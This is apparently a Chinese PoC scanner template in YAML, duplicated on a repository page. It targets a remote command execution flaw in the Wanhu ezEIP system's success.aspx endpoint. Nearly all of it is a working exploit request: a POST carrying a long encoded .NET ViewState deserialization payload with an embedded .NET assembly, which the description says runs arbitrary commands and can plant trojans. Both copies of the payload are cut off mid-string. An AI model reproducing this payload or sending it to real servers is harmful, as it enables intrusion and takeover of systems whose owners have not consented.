Poc_Scanner/poc/OA-Poc/ezEIP-success-RCE.yaml

keyword: 万户
name: 万户ezEIP企业管理系统success.aspx接口远程命令执行漏洞
description: |
  使用该漏洞可以在目标服务器上执行任意命令，导致服务器被植入木马等高危文件。
requests: 
  path: "/member/success.aspx"
  method: POST
  headers:
    User-agent: 
    Content-length: 
    Accept: 
    Content-type: application/x-www-form-urlencoded
    Accept-Encoding: 
    Cookie: 
    Referer: 
    X-Forwarded-For: 
  body-raw: |-
    __VIEWSTATE=%2FwEyiGEAAQAAAP%2F%2F%2F%2F8BAAAAAAAAAAwCAAAAV1N5c3RlbS5XaW5kb3dzLkZvcm1zLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQUBAAAAIVN5c3RlbS5XaW5kb3dzLkZvcm1zLkF4SG9zdCtTdGF0ZQEAAAARUHJvcGVydHlCYWdCaW5hcnkHAgIAAAAJAwAAAA8DAAAAxy8AAAIAAQAAAP%2F%2F%2F%2F8BAAAAAAAAAAQBAAAAf1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkxpc3RgMVtbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0DAAAABl9pdGVtcwVfc2l6ZQhfdmVyc2lvbgUAAAgICQIAAAAKAAAACgAAABACAAAAEAAAAAkDAAAACQQAAAAJBQAAAAkGAAAACQcAAAAJCAAAAAkJAAAACQoAAAAJCwAAAAkMAAAADQYHAwAAAAEBAAAAAQAAAAcCCQ0AAAAMDgAAAGFTeXN0ZW0uV29ya2Zsb3cuQ29tcG9uZW50TW9kZWwsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0zMWJmMzg1NmFkMzY0ZTM1BQQAAABqU3lzdGVtLldvcmtmbG93LkNvbXBvbmVudE1vZGVsLlNlcmlhbGl6YXRpb24uQWN0aXZpdHlTdXJyb2dhdGVTZWxlY3RvcitPYmplY3RTdXJyb2dhdGUrT2JqZWN0U2VyaWFsaXplZFJlZgIAAAAEdHlwZQttZW1iZXJEYXRhcwMFH1N5c3RlbS5Vbml0eVNlcmlhbGl6YXRpb25Ib2xkZXIOAAAACQ8AAAAJEAAAAAEFAAAABAAAAAkRAAAACRIAAAABBgAAAAQAAAAJEwAAAAkUAAAAAQcAAAAEAAAACRUAAAAJFgAAAAEIAAAABAAAAAkXAAAACRgAAAABCQAAAAQAAAAJGQAAAAkaAAAAAQoAAAAEAAAACRsAAAAJHAAAAAELAAAABAAAAAkdAAAACR4AAAAEDAAAABxTeXN0ZW0uQ29sbGVjdGlvbnMuSGFzaHRhYmxlBwAAAApMb2FkRmFjdG9yB1ZlcnNpb24IQ29tcGFyZXIQSGFzaENvZGVQcm92aWRlcghIYXNoU2l6ZQRLZXlzBlZhbHVlcwAAAwMABQULCBxTeXN0ZW0uQ29sbGVjdGlvbnMuSUNvbXBhcmVyJFN5c3RlbS5Db2xsZWN0aW9ucy5JSGFzaENvZGVQcm92aWRlcgjsUTg%2FAgAAAAoKAwAAAAkfAAAACSAAAAAPDQAAAAASAAACTVqQAAMAAAAEAAAA%2F%2F8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDABKREWMAAAAAAAAAAOAAAiELAQsAAAoAAAAGAAAAAAAAjikAAAAgAAAAQAAAAAAAEAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACAAAAAAgAAAAAAAAMAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAADQpAABXAAAAAEAAAKgCAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAlAkAAAAgAAAACgAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAAKgCAAAAQAAAAAQAAAAMAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAGAAAAACAAAAEAAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAABwKQAAAAAAAEgAAAACAAUAlCIAAKAGAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABswAwAcAgAAAQAAEQIoAwAACigEAAAKCgZvBQAACm8GAAAKBm8HAAAKbwgAAAoGbwkAAApvCgAACnIBAABwbwsAAAoLFo0JAAABDH4MAAAKDQclEwg5lQEAABEIcgsAAHAoDQAACi0nEQhyDwAAcCgNAAAKOrsAAAARCHITAABwKA0AAAo6DgEAADhgAQAAcw4AAAoTBBEEbw8AAApyGQAAcG8QAAAKKBEAAAoGbwkAAApvCgAACnIpAABwbwsAAAooEgAACm8TAAAKEwURBG8PAAAKcjEAAHARBSgUAAAKbxUAAAoRBG8PAAAKF28WAAAKEQRvDwAAChdvFwAAChEEbw8AAAoWbxgAAAoRBG8ZAAAKJhEEbxoAAApvGwAAChMGBm8HAAAKEQZvHAAACji7AAAABm8JAAAKbx0AAApyOQAAcG8LAAAKKBIAAAoMKBEAAAoGbwkAAApvHQAACnJJAABwbwsAAAooEgAACm8TAAAKDQZvBQAACglvHgAACggoHwAACgZvBwAACnJTAABwbxwAAAorVwZvCQAACm8dAAAKcjkAAHBvCwAACigSAAAKDCgRAAAKBm8JAAAKbx0AAApySQAAcG8LAAAKKBIAAApvEwAACg0JCCgfAAAKBm8HAAAKclMAAHBvHAAACt4gEwcGbwcAAApyWQAAcBEHbyAAAAooFAAACm8cAAAK3gAGbwcAAApvIQAACgZvBwAACm8iAAAKKkEcAAAAAAAAIgAAAMMBAADlAQAAIAAAABIAAAFCU0pCAQABAAAAAAAMAAAAdjQuMC4zMDMxOQAAAAAFAGwAAAAMAgAAI34AAHgCAAD8AgAAI1N0cmluZ3MAAAAAdAUAAGQAAAAjVVMA2AUAABAAAAAjR1VJRAAAAOgFAAC4AAAAI0Jsb2IAAAAAAAAAAgAAAUcUAgAJAAAAAPolMwAWAAABAAAAEgAAAAIAAAABAAAAIgAAAAIAAAABAAAAAQAAAAMAAAAAAAoAAQAAAAAABgApACIABgBWADYABgB2ADYACgCoAJ0ACgDAAJ0ACgDoAJ0ACgAIAZ0ADgA%2FASABBgBoASIABgBtASIADgCZAYYBDgChAYYBBgDZAc0BBgDrASIABgB8AnICBgCcAnICBgDIAnICBgDbAiIAAAAAAAEAAAAAAAEAAQAAABAAFwAAAAUAAQABAFAgAAAAAIYYMAAKAAEAEQAwAA4AGQAwAAoACQAwAAoAIQC0ABwAIQDSACEAKQDdAAoAIQD1ACYAMQACAQoAIQAUASsAOQBTATAAQQBfATUAUQB0AToAUQB6AT0AWQAwAAoAWQCyAUMAYQDAAUgAaQDiAU0AcQDzAVIAaQAEAlgAUQAOAl4AYQAVAkgAYQAjAmQAYQA%2BAmQAYQBYAmQAWQBsAmkAWQCJAm0AgQCnAnIAMQCxAkgAOQC3AjAAKQDAAjUAiQDNAnYAkQDlAnIAMQDxAgoAMQD3AgoALgALAI0ALgATAJYAfQAEgAAAAAAAAAAAAAAAAAAAAACUAAAABAAAAAAAAAAAAAAAAQAZAAAAAAAEAAAAAAAAAAAAAAATAJ0AAAAAAAQAAAAAAAAAAAAAAAEAIgAAAAAAAAAAAAA8TW9kdWxlPgA0eW1ndGprZS5kbGwARQBtc2NvcmxpYgBTeXN0ZW0AT2JqZWN0AC5jdG9yAFN5c3RlbS5SdW50aW1lLkNvbXBpbGVyU2VydmljZXMAQ29tcGlsYXRpb25SZWxheGF0aW9uc0F0dHJpYnV0ZQBSdW50aW1lQ29tcGF

response: 
  path: ""
  status-code: 200
  body: "IPv4" 
  headers:
    Server: 
    Content-type: 
    Content-length: 
    Date: 
    Connection: 
impact: |
  可造成服务器落入攻击者控制中。
首次上传 2024-10-09 15:15:50 +08:00			`keyword: 万户`
			`name: 万户ezEIP企业管理系统success.aspx接口远程命令执行漏洞`
			`description: \|`
			`使用该漏洞可以在目标服务器上执行任意命令，导致服务器被植入木马等高危文件。`
			`requests:`
			`path: "/member/success.aspx"`
			`method: POST`
			`headers:`
			`User-agent:`
			`Content-length:`
			`Accept:`
			`Content-type: application/x-www-form-urlencoded`
			`Accept-Encoding:`
			`Cookie:`
			`Referer:`
			`X-Forwarded-For:`
			`body-raw: \|-`
			__VIEWSTATE=%2FwEyiGEAAQAAAP%2F%2F%2F%2F8BAAAAAAAAAAwCAAAAV1N5c3RlbS5XaW5kb3dzLkZvcm1zLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQUBAAAAIVN5c3RlbS5XaW5kb3dzLkZvcm1zLkF4SG9zdCtTdGF0ZQEAAAARUHJvcGVydHlCYWdCaW5hcnkHAgIAAAAJAwAAAA8DAAAAxy8AAAIAAQAAAP%2F%2F%2F%2F8BAAAAAAAAAAQBAAAAf1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkxpc3RgMVtbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0DAAAABl9pdGVtcwVfc2l6ZQhfdmVyc2lvbgUAAAgICQIAAAAKAAAACgAAABACAAAAEAAAAAkDAAAACQQAAAAJBQAAAAkGAAAACQcAAAAJCAAAAAkJAAAACQoAAAAJCwAAAAkMAAAADQYHAwAAAAEBAAAAAQAAAAcCCQ0AAAAMDgAAAGFTeXN0ZW0uV29ya2Zsb3cuQ29tcG9uZW50TW9kZWwsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0zMWJmMzg1NmFkMzY0ZTM1BQQAAABqU3lzdGVtLldvcmtmbG93LkNvbXBvbmVudE1vZGVsLlNlcmlhbGl6YXRpb24uQWN0aXZpdHlTdXJyb2dhdGVTZWxlY3RvcitPYmplY3RTdXJyb2dhdGUrT2JqZWN0U2VyaWFsaXplZFJlZgIAAAAEdHlwZQttZW1iZXJEYXRhcwMFH1N5c3RlbS5Vbml0eVNlcmlhbGl6YXRpb25Ib2xkZXIOAAAACQ8AAAAJEAAAAAEFAAAABAAAAAkRAAAACRIAAAABBgAAAAQAAAAJEwAAAAkUAAAAAQcAAAAEAAAACRUAAAAJFgAAAAEIAAAABAAAAAkXAAAACRgAAAABCQAAAAQAAAAJGQAAAAkaAAAAAQoAAAAEAAAACRsAAAAJHAAAAAELAAAABAAAAAkdAAAACR4AAAAEDAAAABxTeXN0ZW0uQ29sbGVjdGlvbnMuSGFzaHRhYmxlBwAAAApMb2FkRmFjdG9yB1ZlcnNpb24IQ29tcGFyZXIQSGFzaENvZGVQcm92aWRlcghIYXNoU2l6ZQRLZXlzBlZhbHVlcwAAAwMABQULCBxTeXN0ZW0uQ29sbGVjdGlvbnMuSUNvbXBhcmVyJFN5c3RlbS5Db2xsZWN0aW9ucy5JSGFzaENvZGVQcm92aWRlcgjsUTg%2FAgAAAAoKAwAAAAkfAAAACSAAAAAPDQAAAAASAAACTVqQAAMAAAAEAAAA%2F%2F8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDABKREWMAAAAAAAAAAOAAAiELAQsAAAoAAAAGAAAAAAAAjikAAAAgAAAAQAAAAAAAEAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACAAAAAAgAAAAAAAAMAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAADQpAABXAAAAAEAAAKgCAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAlAkAAAAgAAAACgAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAAKgCAAAAQAAAAAQAAAAMAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAGAAAAACAAAAEAAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAABwKQAAAAAAAEgAAAACAAUAlCIAAKAGAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABswAwAcAgAAAQAAEQIoAwAACigEAAAKCgZvBQAACm8GAAAKBm8HAAAKbwgAAAoGbwkAAApvCgAACnIBAABwbwsAAAoLFo0JAAABDH4MAAAKDQclEwg5lQEAABEIcgsAAHAoDQAACi0nEQhyDwAAcCgNAAAKOrsAAAARCHITAABwKA0AAAo6DgEAADhgAQAAcw4AAAoTBBEEbw8AAApyGQAAcG8QAAAKKBEAAAoGbwkAAApvCgAACnIpAABwbwsAAAooEgAACm8TAAAKEwURBG8PAAAKcjEAAHARBSgUAAAKbxUAAAoRBG8PAAAKF28WAAAKEQRvDwAAChdvFwAAChEEbw8AAAoWbxgAAAoRBG8ZAAAKJhEEbxoAAApvGwAAChMGBm8HAAAKEQZvHAAACji7AAAABm8JAAAKbx0AAApyOQAAcG8LAAAKKBIAAAoMKBEAAAoGbwkAAApvHQAACnJJAABwbwsAAAooEgAACm8TAAAKDQZvBQAACglvHgAACggoHwAACgZvBwAACnJTAABwbxwAAAorVwZvCQAACm8dAAAKcjkAAHBvCwAACigSAAAKDCgRAAAKBm8JAAAKbx0AAApySQAAcG8LAAAKKBIAAApvEwAACg0JCCgfAAAKBm8HAAAKclMAAHBvHAAACt4gEwcGbwcAAApyWQAAcBEHbyAAAAooFAAACm8cAAAK3gAGbwcAAApvIQAACgZvBwAACm8iAAAKKkEcAAAAAAAAIgAAAMMBAADlAQAAIAAAABIAAAFCU0pCAQABAAAAAAAMAAAAdjQuMC4zMDMxOQAAAAAFAGwAAAAMAgAAI34AAHgCAAD8AgAAI1N0cmluZ3MAAAAAdAUAAGQAAAAjVVMA2AUAABAAAAAjR1VJRAAAAOgFAAC4AAAAI0Jsb2IAAAAAAAAAAgAAAUcUAgAJAAAAAPolMwAWAAABAAAAEgAAAAIAAAABAAAAIgAAAAIAAAABAAAAAQAAAAMAAAAAAAoAAQAAAAAABgApACIABgBWADYABgB2ADYACgCoAJ0ACgDAAJ0ACgDoAJ0ACgAIAZ0ADgA%2FASABBgBoASIABgBtASIADgCZAYYBDgChAYYBBgDZAc0BBgDrASIABgB8AnICBgCcAnICBgDIAnICBgDbAiIAAAAAAAEAAAAAAAEAAQAAABAAFwAAAAUAAQABAFAgAAAAAIYYMAAKAAEAEQAwAA4AGQAwAAoACQAwAAoAIQC0ABwAIQDSACEAKQDdAAoAIQD1ACYAMQACAQoAIQAUASsAOQBTATAAQQBfATUAUQB0AToAUQB6AT0AWQAwAAoAWQCyAUMAYQDAAUgAaQDiAU0AcQDzAVIAaQAEAlgAUQAOAl4AYQAVAkgAYQAjAmQAYQA%2BAmQAYQBYAmQAWQBsAmkAWQCJAm0AgQCnAnIAMQCxAkgAOQC3AjAAKQDAAjUAiQDNAnYAkQDlAnIAMQDxAgoAMQD3AgoALgALAI0ALgATAJYAfQAEgAAAAAAAAAAAAAAAAAAAAACUAAAABAAAAAAAAAAAAAAAAQAZAAAAAAAEAAAAAAAAAAAAAAATAJ0AAAAAAAQAAAAAAAAAAAAAAAEAIgAAAAAAAAAAAAA8TW9kdWxlPgA0eW1ndGprZS5kbGwARQBtc2NvcmxpYgBTeXN0ZW0AT2JqZWN0AC5jdG9yAFN5c3RlbS5SdW50aW1lLkNvbXBpbGVyU2VydmljZXMAQ29tcGlsYXRpb25SZWxheGF0aW9uc0F0dHJpYnV0ZQBSdW50aW1lQ29tcGF

			`response:`
			`path: ""`
			`status-code: 200`
			`body: "IPv4"`
			`headers:`
			`Server:`
			`Content-type:`
			`Content-length:`
			`Date:`
			`Connection:`
			`impact: \|`
			`可造成服务器落入攻击者控制中。`